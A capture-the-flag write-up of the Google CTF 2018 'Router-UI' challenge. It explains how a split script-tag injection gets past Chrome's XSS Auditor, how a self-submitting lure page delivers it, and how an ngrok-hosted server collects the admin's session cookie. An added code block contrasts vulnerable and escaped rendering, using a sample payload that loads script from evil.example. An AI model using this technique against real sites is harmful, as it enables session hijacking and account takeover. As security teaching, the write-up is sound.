Write-Up: Google CTF 2018 - Router-UI

The last days I began to solve some of the Google CTF 2018 Beginner Challenges together with a workmate. After solving about half of them we got to the challenge named “Router-UI”.


So it was about finding an XSS vulnerability on the supplied webpage. XSS stands for Cross-site scripting and describes a vulnerability where the attacker injects client-side scripts into a webpage with the aim of obtaining the user's session token or performing other malicious actions such as manipulating user interaction or logging keystrokes.

We quickly took a look at the page and were presented with a simple login page of the “OffHub Management Interface”.

I tested the login with some random credentials and got an interesting return.

First I ignored the weird formatting of the "wrong credentials" message and tried to inject some JavaScript directly in the username field. Unfortunately Chrome's XSS Auditor caught this attempt immediately. I took another look at the page displayed when I entered wrong credentials: the username and password were separated by two slashes, like the two slashes that follow the protocol name in every URL. So what about injecting two portions of JavaScript that, joined by those slashes, load the real payload from another server?

This is what we need to inject. I removed the password masking so you can see the second part.

The payload obviously has to retrieve the victim's session token and somehow send it to us. This is the code we came up with for the XSS payload that should steal the victim's session token from the cookies:

[Image: google_ctf_code_1.png]

We then wrote a quick & dirty express server to publish an endpoint to which our second payload would send the victim's session token. We could host it temporarily with ngrok.

[Image: google_ctf_code_2.png]

Then we noticed a problem we had not addressed until then: we somehow had to trick the victim into injecting the evil script into the webpage. The description of the challenge reads: “If you claim your link includes cat pictures, I’m sure Wintermuted will click it.”

So we quickly crafted some HTML with a cute cat picture and a hidden copy of the login form from the original webpage that submits itself immediately on load, with an action attribute pointing to https://router-ui.web.ctfcompetition.com/login. Then we set the input values to our first XSS payload, which would in turn load the real payload from our server.


As you can see, we set the username input field's value to “https:” and the password input field's value to the ngrok address plus the path to our payload. We can omit the slashes because they are already present in the HTML of the “wrong credentials” output. By doing so we bypass Chrome's XSS Auditor and load our payload.
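As an added example (not the challenge's or the author's code), the unescaped reflection of `username//password` that makes this attack possible is shown beside the hardened rendering a defender would ship; the function names and the `evil.example` host are assumptions.

```javascript
// Added example: the reflection behind this challenge, next to the fix. The
// "wrong credentials" page echoed `username//password` into the HTML without
// escaping, so the two halves of a script tag reassembled around the slashes.
// Function names and the host below are assumptions, not the challenge's code.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape the characters that can close an HTML text node or attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable: user input is concatenated straight into the response body.
function renderLoginErrorVulnerable(username, password) {
  return `<p>Wrong credentials: ${username}//${password}</p>`;
}

// Hardened: every reflected value is escaped before it enters the markup.
function renderLoginErrorSafe(username, password) {
  return `<p>Wrong credentials: ${escapeHtml(username)}//${escapeHtml(password)}</p>`;
}

// Check a rendered page for markup that was not in the template: strip the
// known wrapper and see whether any tag characters survive in the reflected part.
function reflectedPartHasMarkup(html) {
  const body = html.replace(/^<p>Wrong credentials: /, "").replace(/<\/p>$/, "");
  return /[<>]/.test(body);
}

// Second layer: a session cookie marked HttpOnly is invisible to document.cookie,
// so even a successful injection cannot read it. Secure and SameSite are set too.
function sessionCookieHeader(token) {
  return `session=${encodeURIComponent(token)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample input mirroring the split described in the write-up.
const SAMPLE_USER = '<script src="https:';
const SAMPLE_PASS = 'evil.example/payload.js"></script>';

console.log(renderLoginErrorVulnerable(SAMPLE_USER, SAMPLE_PASS)); // live <script> tag
console.log(renderLoginErrorSafe(SAMPLE_USER, SAMPLE_PASS));       // inert text
```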

[Image: google_ctf_code_3.png]

Finally we added some code to the express server to serve the static HTML (presenting our cat content) and our JavaScript payload, and started ngrok to test everything. For testing we just created a fake session token on the router-ui webpage and opened our cat-content HTML page.

It worked! After jumping for joy I crafted an email with the link to our page and sent it to the specified email address. We had to wait a few seconds and then we saw the session cookie arriving in our server logs. Yes, we got 'em!

After importing the session token we got the admin page.

To get the flag we just had to look up the value of the password input field in Chrome DevTools.

You can find the whole code for the exploit on GitHub: https://git.io/fNvgw
